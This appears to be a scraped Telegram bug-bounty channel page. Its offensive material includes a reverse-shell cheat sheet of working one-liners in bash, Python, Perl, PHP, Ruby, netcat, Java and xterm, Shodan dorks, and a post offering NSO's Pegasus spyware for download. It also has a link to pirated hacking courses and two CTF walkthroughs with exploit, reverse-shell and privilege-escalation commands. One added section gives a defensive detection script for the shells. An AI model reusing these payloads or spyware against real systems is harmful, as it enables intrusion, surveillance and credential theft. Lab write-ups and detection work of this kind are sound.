Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 849 subscribers
Post archive

• Amass
• Amass + Nuclei: Finding domain
• Amass + Nuclei 2: Finding domain
• Finding subdomains with jsubfinder + httpx
• Using FFUF to find RCE
• Full Account Takeover Technique in API/Register
• Oneliner search JS domain using subjs, anew and httpx
• Shodan queries to search SCADA, IoT, Router Devices
• Screenshot page using aquatone using domain files
• Oneliner using shodan and nuclei to scan hosts
• Oneliner finding subdomain using gospider, assetfinder, amass and nuclei
• Oneliner portscan and subdomain discovery using subfinder, cf-check, naabu and httprobe
• Oneliner search SSRF using subfinder, httpx and qsreplace
• Oneliner recon domain and subdomains using chaos, gospider, findomain, assetfinder, amass, httpx and anew
• Oneliner search xss using kxss, xargs and httpx
• Google dork to discover API exposure
• Create script to find and test SQL injection
• Oneliner find xss using subfinder, httpx, katana, gxss, kxss and dalfox
• Domain enumeration and file discovery using ffuf, httpx and findomain
• Oneliner find open redirect using waybackurls, httpx, gf, anew and nuclei
• Oneliner complete enumeration xss, lfi, ssrf in domain using gauplus, anew, gxss, gf, qsreplace, httpx and SecretFinder
• Oneliner check cloudflare using subfinder, dnsx, cf-check, naabu
• Oneliner recon jira using uncover with shodan, censys and fofa and vulnerability scan with nuclei
• Oneliner recon subdomain using assetfinder, httpx, xargs, waybackurls and nuclei vulnerability scan
• Oneliner extract js using haktrails, httpx, getjs, anew, tojson
• Oneliner LFI using gau, gf, qsreplace and xargs

Repost from OSINT Library
#BugBounty #ChatGPT

🔰 CYBER SECURITY COLLECTION 🔰
Collection List:
● Bug Bounty Android Hacking
● Bug Bounty Hunting Guide to an Advanced Earning Method
● Bug Bounty Hunting Offensive Approach to Hunt Bugs
● Bug Bounty Web Hacking
● CISSP full Course 2020
● Hands on Penetration Testing Labs
● Learn Cracking WI-FI passwords keys WEP, WPA WPA2
● Learn Python & Ethical Hacking from Scratch
● Masters in Ethical Hacking with Android
● Practical Bug Bounty
● Practical Ethical Hacking
● RedTeam Blueprint – A unique guide to Ethical Hacking
● Splunk Hands on the Complete Data Analytics
● The Complete Ethical Hacking Course
● The Complete Hacking Course, by Gerri Banfield
● The Complete Nmap No-Nonsense Course
● Wi-Fi Ethical Hacking with Kali
● Windows Privilege Escalation for Beginners
● Windows Privilege Escalation for OSCP & Beyond!
📂 Size: 103.7GB+
🔗 GDrive Link: https://drive.google.com/drive/folders/183SSU6GShal0mzAckd6m9kk0eF2KpcEV?usp=sharing
https://t.me/bugbounty_tech

Repost from Cyber Detective
Interesting way to use LEGBA (https://github.com/evilsocket/legba), the #bruteforce tool from twitter.com/evilsocket: enumerating valid emails for a G Suite domain. Read more about LEGBA: https://www.evilsocket.net/2023/11/02/Enumerate-Bruteforce-Attack-All-The-Things-Presenting-Legba/

Some Shodan Dorks that might be useful in Bug Bounty.
1. org:"target.com"
2. http.status:"<status_code>"
3. product:"<Product_Name>"
4. port:<Port_Number> "Service_Message"
5. port:<Port_Number> "Service_Name"
6. http.component:"<Component_Name>"
7. http.component_category:"<Component_Category>"
8. http.waf:"<firewall_name>"
9. http.html:"<Name>"
10. http.title:"<Title_Name>"
11. ssl.alpn:"<Protocol>"
12. http.favicon.hash:"<Favicon_Hash>"
13. net:"<Net_Range>" (e.g. 104.16.100.52/32)
14. ssl.cert.subject.cn:"<Domain.com>"
15. asn:"<ASnumber>"
16. hostname:"<hostname>"
17. ip:"<IP_Address>"
18. all:"<Keyword>"
19. "Set-Cookie: phpMyAdmin"
20. "Set-Cookie: lang="
21. "Set-Cookie: PHPSESSID"
22. "Set-Cookie: webvpn"
23. "Set-Cookie:webvpnlogin=1"
24. "Set-Cookie:webvpnLang=en"
25. "Set-Cookie: mongo-express="
26. "Set-Cookie: user_id="
27. "Set-Cookie: phpMyAdmin="
28. "Set-Cookie: _gitlab_session"
29. "X-elastic-product: Elasticsearch"
30. "x-drupal-cache"
31. "access-control-allow-origin"
32. "WWW-Authenticate"
33. "X-Magento-Cache-Debug"
34. "kbn-name: kibana"


Pegasus Full
Pegasus is a spyware developed by the Israeli cyber-arms company NSO Group that is designed to be covertly and remotely installed on mobile phones running iOS and Android.
Download Link: CyberSleuthPacks/Pegasus
NOTE: Please do not run it on your native Windows

📚 A gentleman's set for a beginner of 4 books on hacking.
1. Hacking like a porn star. “When we sympathize with suffering, we act like all people; making them easier, like God.” Horace Mann
2. Hacking with the skill of God. “Luck is when preparation meets opportunity.” Seneca
3. Investigate cybercrimes like a rock star. “When I'm standing at the starting gate, it's just me and the slope.” Mikaela Shiffrin
4. Hacking like a legend. “I am a blank slate, and therefore I can create whatever I want.” Tobey Maguire
⏺ Read books #book

Reverse Shell Cheat Sheet

Bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat:
nc -e /bin/sh 10.0.0.1 1234

Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm:
xterm -display 10.0.0.1:1
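
A detection-side companion to the cheat sheet above, added here and not part of the original post: regular-expression signatures for the command-line shapes those one-liners leave in process-creation telemetry, run over constructed events. The signature names, `classify`, `scan` and the sample events are assumptions made for illustration, not a vetted rule set.

```python
import re

# Signatures keyed to the cheat sheet's one-liners (illustrative names, added example).
SIGNATURES = [
    ("bash-dev-tcp", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("python-socket-dup2", re.compile(r"python[\d.]*\s+-c\b.*socket\.socket.*os\.dup2")),
    ("perl-socket-exec", re.compile(r"perl\s+-e\b.*\bsocket\(.*\bexec\(")),
    ("php-fsockopen-exec", re.compile(r"php\s+-r\b.*fsockopen\(.*\bexec\(")),
    ("ruby-tcpsocket-exec", re.compile(r"ruby\b.*-rsocket\b.*TCPSocket.*\bexec\b")),
    ("netcat-exec-shell", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b")),
    # A host before the colon means the X display is remote; ":0" is local and ignored.
    ("xterm-remote-display", re.compile(r"\bxterm\b.*-display\s+[^\s:]+:\d+")),
]

# Constructed process-creation events (pid, user, cmdline); not real telemetry.
SAMPLE_EVENTS = [
    (4101, "www-data", "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"),
    (4102, "www-data", "python -c 'import socket,subprocess,os;s=socket.socket("
                       "socket.AF_INET,socket.SOCK_STREAM);os.dup2(s.fileno(),0)'"),
    (4103, "www-data", "nc -e /bin/sh 10.0.0.1 1234"),
    # The Java/Groovy entry surfaces as its bash child process.
    (4104, "tomcat", "/bin/bash -c exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5"),
    (4105, "alice", "xterm -display 10.0.0.1:1"),
    # Benign look-alikes that must not alert.
    (5001, "alice", "nc -zv db.internal 5432"),
    (5002, "alice", "python3 -c 'import socket; print(socket.gethostname())'"),
    (5003, "alice", "xterm -display :0"),
    (5004, "backup", "bash -c 'tar czf /tmp/etc.tgz /etc > /dev/null 2>&1'"),
]

def classify(cmdline):
    """Return the names of every signature matching one command line."""
    return [name for name, rx in SIGNATURES if rx.search(cmdline)]

def scan(events):
    """Return one alert dict per event that matches at least one signature."""
    alerts = []
    for pid, user, cmdline in events:
        hits = classify(cmdline)
        if hits:
            alerts.append({"pid": pid, "user": user, "signatures": hits})
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Command-line matching only catches the literal forms; pairing it with a rule for an interactive shell whose stdin/stdout is a network socket covers renamed or encoded variants.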

Journey through Analytical CTF: Unveiling Vulnerabilities and Escalating Privileges

Recently, I had the exhilarating experience of delving into the Analytical CTF, where every step seemed like a puzzle waiting to be solved. Here's a detailed account of my journey:

Discovering the Target
Upon initiating the challenge, I quickly identified the target IP as 10.10.11.233 and added it to my /etc/hosts file for easy access.

Unveiling Metabase Vulnerability
My exploration began with a visit to analytical.htb, revealing a login page under data.analytical.htb. A swift investigation led me to discover a potential Remote Code Execution (RCE) vulnerability within Metabase, marked as CVE-2023-38646. After scouring through resources, I stumbled upon the proof of concept (POC) on GitHub:
git clone https://github.com/securezeron/CVE-2023-38646
To exploit this vulnerability, I executed the following commands:
python3 exploit.py --rhost http://data.analytical.htb --lhost <ip> --port <4444>
nc -lnvp 4444
These commands provided crucial insights into the system, revealing "/proc/self/environ" and uncovering login credentials:
META_USER=meta********
META_PASS=An4l**************8

Gaining Initial Access
With the obtained credentials, I swiftly gained SSH access:
ssh metalytics@analytical.htb
This breakthrough enabled me to acquire the user flag:
user.txt : 9d1f6be*************************

Privilege Escalation Endeavors
Eager to escalate privileges, I probed for sudo permissions but to no avail. Nevertheless, I gleaned system information using commands such as id, uid, and uname -a, revealing the system's configuration:
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Further exploration led me to uncover vulnerabilities, notably the "CVE-2023-2640 and CVE-2023-32629," also known as GameOver(lay). Referencing available POCs, I crafted an exploit script:
wget https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
The script, designed to exploit Ubuntu privilege escalation vulnerabilities, facilitated my journey towards root privileges:
bash exploit.sh

Root Access Achieved
Executing the exploit script proved fruitful, granting me root access to the system:
root.txt : 9b30872bc********************
With this, I concluded my expedition through the Analytical CTF, armed with newfound knowledge and triumphs. The journey underscored the importance of meticulous exploration and resourcefulness in navigating complex cybersecurity challenges.

Hey guys, I am looking for a good trainer from Bangalore. If anyone here is interested, or you know anyone from Bangalore, do let me know. 😄

Target IP: 10.10.11.2*

Upon initiating the reconnaissance phase with Nmap, I unearthed several open ports:
- Port 22 (SSH)
- Port 80 (HTTP)
- Port 2170 (eyetv)

Proceeding with a meticulous Gobuster scan, I uncovered a few directories such as /images, /css, and /js, all of which returned a discouraging 403 Forbidden error. Undeterred, I decided to explore the DNS, where I stumbled upon a promising subdomain, dev, which I promptly added to my /etc/hosts file for further investigation.

Next, I randomly got the idea to check the robots.txt file and struck gold: a directory named administrator, suggesting that the site was running Joomla. Furthermore, my interest was piqued upon discovering a recently disclosed CVE: 2023-23752. I quickly checked GitHub and stumbled upon an exploit at [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752?tab=readme-ov-file). Executing the exploit with Ruby, I targeted the vulnerable URL and successfully obtained login credentials:
- Username: le***
- DB Password: P4nth*************##

With the acquired credentials, I gained administrative access to the system. Navigating to System > Administrator Templates > index.php, I leveraged a bash script to establish a reverse shell:
# exec("/bin/bash -c 'bash -i >& /tcp/dev 10.10.14.*/4433 0>&1'")
Subsequently, I listened on port 4433 with Netcat and stabilized the shell using Python's pty:
stty raw -echo; fg
Aware that MySQL was operational, I accessed it with:
mysql -u lew** -p
Inside the Joomla database, I explored the sd4fg_user table, revealing encrypted passwords for both 'lewis' and 'logan'. Having cracked 'logan's password using John the Ripper (teq**********), I successfully logged in via SSH. Voilà! I secured the user.txt: d6a93fb199df********************

### Privilege Escalation:
Upon inspecting commands running under 'logan', I singled out /usr/bin/apport-cli. Upon executing sudo /usr/bin/apport-cli -f, a menu prompted me to choose options 1, 2, or V for viewing the report. Inspecting the environment variables, I noticed:
== ProcEnviron =================================
LANG=en_US.UTF-8
TERM=xterm-256color
PATH=(custom, no user)
SHELL=/bin/bash
Lastly, a tantalizing '!' prompted me to execute it, granting me root access. Eureka! I triumphantly retrieved the root.txt: 85518faf01*************** With that, I successfully navigated through the intricate maze of challenges, honing my cybersecurity skills along the way. Until the next CTF adventure, stay curious and keep exploring!

CTF Walkthrough: DEvvortex - Gaining Root Access Recently, I had the opportunity to delve into a captivating Capture The Flag (CTF) challenge where I encountered a series of intriguing hurdles. Let me walk you through the steps I took to conquer this challenge.

Check out, how to use the hackerone

Ready to level up your Bug Bounty game? Read through to discover the top 5 mistakes to avoid! 🛡️💻

Top 8 cyber attacks of 2024